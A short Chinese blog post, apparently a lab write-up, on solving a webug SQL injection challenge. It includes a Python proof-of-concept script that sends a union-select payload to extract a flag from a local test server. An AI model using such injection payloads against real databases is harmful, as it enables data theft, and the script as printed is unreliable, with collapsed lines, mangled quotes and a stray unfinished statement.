用python寫註入漏洞的poc
阿新 • • 發佈:2018-04-30
html () fin 數據 import for 正則 ase poc
webug靶場一道簡單的註入題
加點後報錯
could not to the database You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘1‘‘‘ at line 1
大致可以猜出是雙引號的問題,閉合即可,接下來就是常規的註入過程,最後拿到flag
下面是代碼
#-*- coding:utf-8 -*- import requests import re defpoc(): url="http://192.168.241.128/pentest/test/sqli/sqltamp.php" data={ "gid":"-1‘ union select 1,flag,3,4 from flag #" } req=requests.get(url,data) red=requests.p html=req.content html=html.decode(‘utf-8‘) sear=r‘名稱為:(.+?)</font>‘ flag=re.findall(sear,html) with open(‘test1.txt‘,‘w‘) as f: f.write(str(flag)) if __name__ == ‘__main__‘: poc()
這裏我用正則匹配將flag匹配並寫入文件,一定要對返回的數據進行轉碼
否則匹配不到,還有%23要寫成#才能被python識別。
用python寫註入漏洞的poc